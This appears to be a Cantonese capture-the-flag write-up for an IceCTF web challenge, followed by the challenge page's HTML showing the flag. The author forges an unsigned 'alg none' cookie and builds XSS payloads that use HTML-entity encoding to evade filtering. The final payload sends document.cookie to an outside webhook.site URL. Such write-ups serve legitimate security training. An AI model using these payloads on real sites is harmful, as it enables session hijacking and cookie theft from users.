#token base64.b64decode('eyJ0eXAiOiJKV1QiLCJhbGciOiJub25lIn0=') #{"typ":"JWT","alg":"none"} base64.b64decode('eyJ1c2VybmFtZSI6ImNhdHBhd24iLCJmbGFnIjoiSWNlQ1RGe2hvcGUgeW91IGRvbid0IHRoaW5rIHRoaXMgaXMgYSByZWFsIGZsYWd9In0==') #{"username":"catpawn","flag":"IceCTF{hope you don\'t think this is a real flag}"}
import base64 base64.b64encode('{"username":"admin","flag":"IceCTF{hope you don\'t think this is a real flag}"}') #eyJ1c2VybmFtZSI6ImFkbWluIiwiZmxhZyI6IkljZUNURntob3BlIHlvdSBkb24ndCB0aGluayB0aGlzIGlzIGEgcmVhbCBmbGFnfSJ9
改完之後發現右上角個username係無變過既 , 留個言試下先啦咁唯有
竟然都係無變過!!! cookies save得唔會冇用掛 , 盡下人事禁埋入去 comment 到睇
竟然變左!! , 咁開始試下構造D xss payload玩弄下個website啦
1 2 3
improt base64 base64.b64encode('{"username":"<script>alert(1)</script>","flag":"IceCTF{hope you don\'t think this is a real flag}"}') #eyJ1c2VybmFtZSI6IjxzY3JpcHQ+YWxlcnQoMSk8L3NjcmlwdD4iLCJmbGFnIjoiSWNlQ1RGe2hvcGUgeW91IGRvbid0IHRoaW5rIHRoaXMgaXMgYSByZWFsIGZsYWd9In0=
但是原來有做 filtering
試下試下發現佢好似扑左都幾多野。結果最後試左呢抽野出黎係work既
1 2 3
import base64 base64.b64encode('{"username":"<img src=x onerror=\'javascript:alert('XSS')\'>","flag":"IceCTF{hope you don\'t think this is a real flag}"}') #eyJ1c2VybmFtZSI6IjxpbWcgc3JjPXggb25lcnJvcj0nJiMxMDYmIzk3JiMxMTgmIzk3JiMxMTUmIzk5JiMxMTQmIzEwNSYjMTEyJiMxMTYmIzU4JiM5NyYjMTA4JiMxMDEmIzExNCYjMTE2JiM0MCYjMzkmIzg4JiM4MyYjODMmIzM5JiM0MSc+IiwiZmxhZyI6IkljZUNURntob3BlIHlvdSBkb24ndCB0aGluayB0aGlzIGlzIGEgcmVhbCBmbGFnfSJ9
import base64 base64.b64encode('{"username":"<img src=x onerror=\'function httpGet(){var xmlHttp = new XMLHttpRequest();xmlHttp.open("GET", "https://webhook.site/928e4501-4b73-4491-a3de-10e0cad789cb?a=" + document.cookie, false );xmlHttp.send( null );}httpGet();\'>","flag":"IceCTF{hope you don\'t think this is a real flag}"}') #eyJ1c2VybmFtZSI6IjxpbWcgc3JjPXggb25lcnJvcj0nJiMxMDImIzExNyYjMTEwJiM5OSYjMTE2JiMxMDUmIzExMSYjMTEwJiMzMiYjMTA0JiMxMTYmIzExNiYjMTEyJiM3MSYjMTAxJiMxMTYmIzQwJiM0MSYjMTIzJiMxMTgmIzk3JiMxMTQmIzMyJiMxMjAmIzEwOSYjMTA4JiM3MiYjMTE2JiMxMTYmIzExMiYjMzImIzYxJiMzMiYjMTEwJiMxMDEmIzExOSYjMzImIzg4JiM3NyYjNzYmIzcyJiMxMTYmIzExNiYjMTEyJiM4MiYjMTAxJiMxMTMmIzExNyYjMTAxJiMxMTUmIzExNiYjNDAmIzQxJiM1OSYjMTIwJiMxMDkmIzEwOCYjNzImIzExNiYjMTE2JiMxMTImIzQ2JiMxMTEmIzExMiYjMTAxJiMxMTAmIzQwJiMzNCYjNzEmIzY5JiM4NCYjMzQmIzQ0JiMzMiYjMzQmIzEwNCYjMTE2JiMxMTYmIzExMiYjMTE1JiM1OCYjNDcmIzQ3JiMxMTkmIzEwMSYjOTgmIzEwNCYjMTExJiMxMTEmIzEwNyYjNDYmIzExNSYjMTA1JiMxMTYmIzEwMSYjNDcmIzU3JiM1MCYjNTYmIzEwMSYjNTImIzUzJiM0OCYjNDkmIzQ1JiM1MiYjOTgmIzU1JiM1MSYjNDUmIzUyJiM1MiYjNTcmIzQ5JiM0NSYjOTcmIzUxJiMxMDAmIzEwMSYjNDUmIzQ5JiM0OCYjMTAxJiM0OCYjOTkmIzk3JiMxMDAmIzU1JiM1NiYjNTcmIzk5JiM5OCYjNjMmIzk3JiM2MSYjMzQmIzMyJiM0MyYjMzImIzEwMCYjMTExJiM5OSYjMTE3JiMxMDkmIzEwMSYjMTEwJiMxMTYmIzQ2JiM5OSYjMTExJiMxMTEmIzEwNyYjMTA1JiMxMDEmIzQ0JiMzMiYjMTAyJiM5NyYjMTA4JiMxMTUmIzEwMSYjMzImIzQxJiM1OSYjMTIwJiMxMDkmIzEwOCYjNzImIzExNiYjMTE2JiMxMTImIzQ2JiMxMTUmIzEwMSYjMTEwJiMxMDAmIzQwJiMzMiYjMTEwJiMxMTcmIzEwOCYjMTA4JiMzMiYjNDEmIzU5JiMxMjUmIzEwNCYjMTE2JiMxMTYmIzExMiYjNzEmIzEwMSYjMTE2JiM0MCYjNDEmIzU5Jz4iLCJmbGFnIjoiSWNlQ1RGe2hvcGUgeW91IGRvbid0IHRoaW5rIHRoaXMgaXMgYSByZWFsIGZsYWd9In0=
<divclass="ribbon pink"></div> <divclass="container"> <divclass="flag center blue white-text"> IceCTF{who_trusts_these_cookies_anyway?} </div> <divclass="row post"> <divclass="col s12"> <divclass="card"> <divclass="card-image"> <imgsrc="/static/img/icectfteam.jpg"> <spanclass="card-title">The First Compiler</span> </div> <aclass="btn-floating btn-large waves-effect waves-light pink comment-btn modal-trigger"href="#comment-modal"data-id="1"><iclass="material-icons">comment</i></a>
<divclass="card-content"> <h5>IceCTF Worked on The First Compiler</h5> <p>It\'s not very commonly known, but the IceCTF actually worked on the first compiler with the famous Grace Hopper</p> <p>The IceCTF team is responsible for a lot of the early achievements in the Computer Science field, not just the first compiler. Duis turpis nisl, accumsan ut pulvinar sit amet, vestibulum id justo. Nunc laoreet urna ut augue pellentesque, non tempus orci maximus. Aenean eget aliquet enim.</p> <p>Sed purus ligula, gravida nec lorem in, vulputate lobortis tortor. Sed blandit rutrum malesuada. Aenean feugiat lectus sit amet lacus dictum sagittis. Nunc interdum justo a felis venenatis molestie. Etiam lacinia mi vitae eros tempus pharetra. Cras a malesuada ex. Vivamus vel est laoreet, facilisis dolor in, porttitor est. Suspendisse in pulvinar ex.</p> </div> </div> </div> </div> </div>
<divclass="ribbon cyan"></div> <divclass="container"> <divclass="row"> <divclass="col s12"> <divclass="card"> <divclass="card-image"> <imgsrc="/static/img/eniac.jpg"> <spanclass="card-title">The ENIAC!</span> </div> <aclass="btn-floating btn-large waves-effect waves-light cyan comment-btn modal-trigger"href="#comment-modal"data-id="2"><iclass="material-icons">comment</i></a> <divclass="card-content"> <h5>The IceCTF Team Created The ENIAC!</h5> <p>Along with the first compiler, the IceCTF also work on creating the very first computer. The ENIAC! </p> <p>There\'s no suprise that the brilliant minds that made one of the most successful hacking competitions in 2018 also were involved with creating what is today known as "the first computer". Although the IceCTF team was not happy with how history decided to name their machine. They opted for the more hip name "puter".</p> <p>Sed purus ligula, gravida nec lorem in, vulputate lobortis tortor. Sed blandit rutrum malesuada. Aenean feugiat lectus sit amet lacus dictum sagittis. Nunc interdum justo a felis venenatis molestie. Etiam lacinia mi vitae eros tempus pharetra. Cras a malesuada ex. Vivamus vel est laoreet, facilisis dolor in, porttitor est. Suspendisse in pulvinar ex.</p> </div> </div> </div> </div> </div>
<footerclass="page-footer grey darken-3"> <divclass="container"> <divclass="row"> <divclass="col l6 s12"> <h5class="white-text">About Me</h5> <pclass="grey-text text-lighten-4">I like blogging about images. I hope you join me on my journey of exploring the world with me!</p> </div> </div> </div> <divclass="footer-copyright"> <divclass="container"> Made with <aclass="brown-text text-lighten-3"href="http://materializecss.com">Materialize</a> </div> </div> </footer>